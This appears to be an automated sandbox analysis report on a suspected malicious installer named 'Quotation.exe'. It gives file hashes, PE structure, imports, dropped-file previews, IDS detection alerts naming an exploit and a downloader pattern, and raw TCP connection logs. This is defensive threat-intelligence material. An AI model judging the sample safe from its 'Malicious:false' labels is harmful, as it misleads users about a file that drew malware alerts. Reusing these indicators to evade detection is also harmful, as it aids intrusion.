                                                                                          SHA-512:A3AD08B814568466AF4AE38ED952C2BE0090827E88DE9C264A78AEDA2FF06F44BE81B79423C3E1F79DC007F58A230340190E0AAD5874C8426E966E33ABCF9C0F
                                                                                          Malicious:false
                                                                                          Preview:......AA......55....).............gg...............................................~~~~~...||................```..................!!!!.A...............<.............T............q................................tttt..+................................ddd.AA......'aoE...?K.=S..2t..x..j.e.3.4lN.U.u...A......2...Z@..z.. .qsk.:[..TP.n|S.\..X..`...BC..1...,.f..f......=.y[.......>....6.M.+..Iq=....h.!.].....E.....(..P.D..m....f......0......g.LiV...QY.../|.<.~J....&..r......p..H..=..<U.....*..Gy.#.'.......b...WH.$.vc..9.f...)...........#df^w......OaoE...?K.=S..2t..x..j.e..Q.T..f....B3.4lN.U.u...A....Z@..z.. .qsk.:[..TP.n|S.\..X..`...BC..1...,...........2y[.......>....6.M.+..Iq=....h.!.].....E.....(........@.P.D..m.}......g.LiV...QY.../|.<.~J....&..r......p..H.._..Gy..|..........'.......b...WH.$.vc..9.f...f......f.... ...7df^w......OaoE...?K.=S..2t ....q...F.x..j.e.3.4lN.U.u...A....Z@..z.. .qsk.:[..TP.n|S.\..X..`...BC..1.....:T.f.q.....;,...y[......
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):288955
                                                                                          Entropy (8bit):1.2577770955280814
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
                                                                                          MD5:0B62328C4966F6B879B3C13B7FBD9C0D
                                                                                          SHA1:6DD81F12E739E81E06778067513ED1178A06AFC9
                                                                                          SHA-256:645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
                                                                                          SHA-512:2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
                                                                                          Malicious:false
                                                                                          Preview:.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................|............................................................[.................................................\.......................v...........o...................................m...........
                                                                                          Process:C:\Users\user\Desktop\Quotation.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):149107
                                                                                          Entropy (8bit):4.608068435200046
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:sTyvrYiIBN1I+3nMEIg9Hkb5pn4ItMwcyo8uO:OqrdIr7XbJWz48uO
                                                                                          MD5:ED9C3E5E3DEA88C54708F64FFA3CEFBC
                                                                                          SHA1:2331CAB7644ADAF10C0614EDD529B951FE893929
                                                                                          SHA-256:CB82D952004AFD4E0673B0948FD9F283EDCE71D413E8B3C1AC31D0D9C9C5ADB5
                                                                                          SHA-512:0CE07A554CA33A61586FCB6757E83F947D2B259D6A8DD976234AEBF1A5D577C7BA81D0DC04AA9B912C01BDC1222EC5A403D5AB2DD668630E8F028CA904F6828D
                                                                                          Malicious:false
                                                                                          Preview:.....<<...........t........................>............J..............I..kkkk..........,.......)...JJ.....q..........N.....%%%.PPP.............................``.............&&&&&&&.2.g......#...........@@....q......h...........3......E.......66.. ........... .--........vv..............'......o................_..........P..=........t.J....o...............................................?......[.%%..55...................................Y......i......''''.......aaaa......)..............................q...<.{..........l..................y...5............HH...............mm.............__....b...i.3.......KKK........n..i...'.l..........sss.......$$$......[..ee..............................'..|...............qq..............,,...................../...b.......#...l...ttt..............=......g...........F.mm...."...^..........oo.."......`................................iii.......OO.......................0..y...4........................zz.........+++.PP..c.........ZZZZ.G....>..^^^..)...(....
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.812324528064551
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:Quotation.exe
                                                                                          File size:1'196'832 bytes
                                                                                          MD5:5bdcc2d33ca974c1d8448afcf83f74d1
                                                                                          SHA1:f693dea01991d995173a5934d478ad43c50e28e2
                                                                                          SHA256:4ad4bb99aa68ac6d5828c71c3f3d5d2983ead0626fd77aba7bb98de727a4b90b
                                                                                          SHA512:35633187911d09542892a55671ce6d2953418466185b57aa506fabf039c97a7375c8ad4268f3ded8f9fe5bb7a36a3c688d2321056b7c0aff3546a630df30bbbf
                                                                                          SSDEEP:24576:X4nhDoAFnNn+rb27TGQwpoxmBNFt/ZNXLGQ7WczkxFnfbP9:X+hkSNwbwGlym5tBNXKQKczg
                                                                                          TLSH:4A4523297692C08BE94257384EF7E37ADA7DED013C25916773303B4EAD7528CDE8A610
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.
                                                                                          Icon Hash:873335651170390f
                                                                                          Entrypoint:0x4036da
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:true
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                                                          Signature Valid:false
                                                                                          Signature Issuer:CN=pgntt, O=pgntt, L=Sainte-Menehould, C=FR
                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                          Error Number:-2146762487
                                                                                          Not Before, Not After
                                                                                          • 05/09/2024 09:34:43 05/09/2027 09:34:43
                                                                                          Subject Chain
                                                                                          • CN=pgntt, O=pgntt, L=Sainte-Menehould, C=FR
                                                                                          Version:3
                                                                                          Thumbprint MD5:C83ED018C13F0E1F78CAD29D0DE65332
                                                                                          Thumbprint SHA-1:F638CA280DC804CB2077BA6EAC3F71B87E5BECDC
                                                                                          Thumbprint SHA-256:E4658D82F4727F4C515694D57CEC113E852D7A1FA832B57D1A41C15C37F88C59
                                                                                          Serial:64418F2BCCA72420321A8611600BB9F9160A2B14
                                                                                          Instruction
                                                                                          sub esp, 000003ECh
                                                                                          push ebx
                                                                                          push ebp
                                                                                          push esi
                                                                                          push edi
                                                                                          xor ebx, ebx
                                                                                          mov edi, 00408528h
                                                                                          push 00008001h
                                                                                          mov dword ptr [esp+14h], ebx
                                                                                          mov ebp, ebx
                                                                                          call dword ptr [00408170h]
                                                                                          mov esi, dword ptr [004080ACh]
                                                                                          lea eax, dword ptr [esp+2Ch]
                                                                                          xorps xmm0, xmm0
                                                                                          mov dword ptr [esp+40h], ebx
                                                                                          push eax
                                                                                          movlpd qword ptr [esp+00000144h], xmm0
                                                                                          mov dword ptr [esp+30h], 0000011Ch
                                                                                          call esi
                                                                                          test eax, eax
                                                                                          jne 00007F00F52441E9h
                                                                                          lea eax, dword ptr [esp+2Ch]
                                                                                          mov dword ptr [esp+2Ch], 00000114h
                                                                                          push eax
                                                                                          call esi
                                                                                          push 00000053h
                                                                                          pop eax
                                                                                          mov dl, 04h
                                                                                          mov byte ptr [esp+00000146h], dl
                                                                                          cmp word ptr [esp+40h], ax
                                                                                          jne 00007F00F52441C3h
                                                                                          mov eax, dword ptr [esp+5Ah]
                                                                                          add eax, FFFFFFD0h
                                                                                          mov word ptr [esp+00000140h], ax
                                                                                          jmp 00007F00F52441BDh
                                                                                          xor eax, eax
                                                                                          jmp 00007F00F52441A4h
                                                                                          mov dl, byte ptr [esp+00000146h]
                                                                                          cmp dword ptr [esp+30h], 0Ah
                                                                                          jnc 00007F00F52441BDh
                                                                                          movzx eax, word ptr [esp+38h]
                                                                                          mov dword ptr [esp+38h], eax
                                                                                          jmp 00007F00F52441B6h
                                                                                          mov eax, dword ptr [esp+38h]
                                                                                          mov dword ptr [007A8638h], eax
                                                                                          movzx eax, byte ptr [esp+30h]
                                                                                          shl ax, 0008h
                                                                                          movzx ecx, ax
                                                                                          movzx eax, byte ptr [esp+34h]
                                                                                          or ecx, eax
                                                                                          movzx eax, byte ptr [esp+00000140h]
                                                                                          shl ax, 0008h
                                                                                          shl ecx, 10h
                                                                                          movzx eax, word ptr [eax]
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3db0000x3e910.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x1231280x11f8.data
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x6c0b0x6e009178309eee1a86dc5ef945d6826a6897False0.6605823863636363data6.398414552532143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x80000x18960x1a000885e83a553c38819d1fab2908ca0cf5False0.4307391826923077data4.86610208699674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xa0000x39e6400x2005c0f03a1a77f205400c2cbabec9976c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .ndata0x3a90000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x3db0000x3e9100x3ea002690c3c0c1de505f961321c7e2d6da34False0.6915076097804391data6.574790239627466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x3db3880x16482PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000394451383867
                                                                                          RT_ICON0x3f18100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.486498876138649
                                                                                          RT_ICON0x4020380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5308492747529956
                                                                                          RT_ICON0x40b4e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5497227356746766
                                                                                          RT_ICON0x4109680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5415682569674067
                                                                                          RT_ICON0x414b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5884854771784233
                                                                                          RT_ICON0x4171380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6179643527204502
                                                                                          RT_ICON0x4181e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6668032786885246
                                                                                          RT_ICON0x418b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                                          RT_DIALOG0x418fd00x100dataEnglishUnited States0.5234375
                                                                                          RT_DIALOG0x4190d00x11cdataEnglishUnited States0.6056338028169014
                                                                                          RT_DIALOG0x4191f00xc4dataEnglishUnited States0.5918367346938775
                                                                                          RT_DIALOG0x4192b80x60dataEnglishUnited States0.7291666666666666
                                                                                          RT_GROUP_ICON0x4193180x84Targa image data - Map 32 x 25730 x 1 +1EnglishUnited States0.7348484848484849
                                                                                          RT_VERSION0x4193a00x220dataEnglishUnited States0.5110294117647058
                                                                                          RT_MANIFEST0x4195c00x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5529131985731273
                                                                                          DLLImport
                                                                                          ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                                          SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                                                          ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                          USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                                                          GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                                          KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-11-11T11:48:51.460958+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949705TCP
                                                                                          2024-11-11T11:49:29.254638+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949712TCP
                                                                                          2024-11-11T11:50:07.152121+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949868142.250.186.78443TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 11, 2024 11:50:06.154162884 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.154210091 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:06.154288054 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.165528059 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.165546894 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:06.763602972 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:06.763680935 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.764764071 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:06.764812946 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.870342970 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.870363951 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:06.870748043 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:06.870837927 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.874968052 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:06.919325113 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.152110100 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.155478954 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:07.155495882 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.159461021 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:07.159544945 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:07.159595966 CET44349868142.250.186.78192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.159672976 CET49868443192.168.2.9142.250.186.78
                                                                                          Nov 11, 2024 11:50:07.185908079 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.185950041 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.186132908 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.186393976 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.186404943 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.780504942 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.780579090 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.834254980 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.834284067 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.834803104 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:07.834865093 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.835457087 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:07.883333921 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.342187881 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.342328072 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.347577095 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.347687960 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.423110008 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.423166990 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.423192978 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.423198938 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.423213005 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.423226118 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.423240900 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.423248053 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.423274040 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.423316956 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.423326015 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.423422098 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.425390005 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.427448988 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.427454948 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.429740906 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.431745052 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.435461044 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.435467958 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.435513020 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.437169075 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.439450026 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.439457893 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.442004919 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.443536043 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.443583965 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.443589926 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.447442055 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.449096918 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.450031042 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.450040102 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.450078011 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.454821110 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.455449104 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.455460072 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.459455013 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.460741997 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.462012053 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.462030888 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.462666035 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.504301071 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.504375935 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.504409075 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.504441023 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.504457951 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.504492044 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.504507065 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.504533052 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.505075932 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.505127907 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.505228043 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.505271912 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.505274057 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.505286932 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.505311012 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.505337000 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.505343914 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.505378008 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.506033897 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.506521940 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.506551027 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.506567955 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.506576061 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.506592989 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.506607056 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.506779909 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.506829023 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.506839991 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.507790089 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.512450933 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.512506008 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.512558937 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.512567043 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.512651920 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.513304949 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.513397932 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.513406038 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.513452053 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.518399954 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.518467903 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.518476009 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.521022081 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.521080017 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.521087885 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.521761894 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.524873972 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.525571108 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.525578976 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.525629997 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.528701067 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.528764009 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.528772116 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.529830933 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.532634974 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.533359051 CET49877443192.168.2.9172.217.18.1
                                                                                          Nov 11, 2024 11:50:10.533369064 CET44349877172.217.18.1192.168.2.9
                                                                                          Nov 11, 2024 11:50:10.533435106 CET49877443192.168.2.9172.217.18.1
